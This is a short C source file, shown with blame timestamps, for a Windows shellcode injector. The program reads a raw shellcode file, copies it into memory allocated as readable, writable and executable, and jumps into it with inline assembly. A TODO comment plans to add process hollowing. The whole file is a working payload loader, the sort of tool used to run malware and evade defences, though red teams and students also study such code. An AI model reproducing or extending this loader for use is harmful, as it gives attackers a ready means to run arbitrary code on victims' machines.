2023-12-13 00:55:54 +01:00
|
|
|
#include <windows.h>
|
|
|
|
|
#include <stdio.h>
|
|
|
|
|
#include <stdlib.h>
|
|
|
|
|
|
2023-12-17 00:09:52 +01:00
|
|
|
// TODO: implement process hollowing
|
|
|
|
|
|
2023-12-13 00:55:54 +01:00
|
|
|
int main(int argc, char *argv[])
|
|
|
|
|
{
|
|
|
|
|
if (argc != 2)
|
|
|
|
|
{
|
|
|
|
|
printf("[?] Usage: injector.exe <shellcode-path>\n");
|
|
|
|
|
return 1;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
printf("[+] Reading shellcode from %s\n", argv[1]);
|
2023-12-17 00:09:52 +01:00
|
|
|
FILE *fin = fopen(argv[1], "rb");
|
2023-12-13 00:55:54 +01:00
|
|
|
|
|
|
|
|
if (fin == NULL)
|
|
|
|
|
{
|
|
|
|
|
printf("[!] Error: could not open file %s\n", argv[1]);
|
|
|
|
|
return 1;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
fseek(fin, 0, SEEK_END);
|
2023-12-17 00:09:52 +01:00
|
|
|
long fsize = ftell(fin);
|
2023-12-13 00:55:54 +01:00
|
|
|
rewind(fin);
|
|
|
|
|
|
2023-12-17 00:09:52 +01:00
|
|
|
unsigned char *buffer = (char *)malloc(fsize);
|
2023-12-13 00:55:54 +01:00
|
|
|
fread(buffer, fsize, 1, fin);
|
|
|
|
|
fclose(fin);
|
|
|
|
|
|
2023-12-17 00:09:52 +01:00
|
|
|
LPVOID base = VirtualAlloc(NULL, fsize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
|
2023-12-13 00:55:54 +01:00
|
|
|
|
|
|
|
|
if (base == NULL)
|
|
|
|
|
{
|
|
|
|
|
printf("[!] Error: could not allocate memory\n");
|
|
|
|
|
return 1;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
memcpy(base, buffer, fsize);
|
|
|
|
|
|
|
|
|
|
printf("[+] Executing 'jmp *%%%p'\n", base);
|
|
|
|
|
__asm__("jmp *%0\n" ::"r"(base));
|
|
|
|
|
|
|
|
|
|
return 1;
|
|
|
|
|
}
|
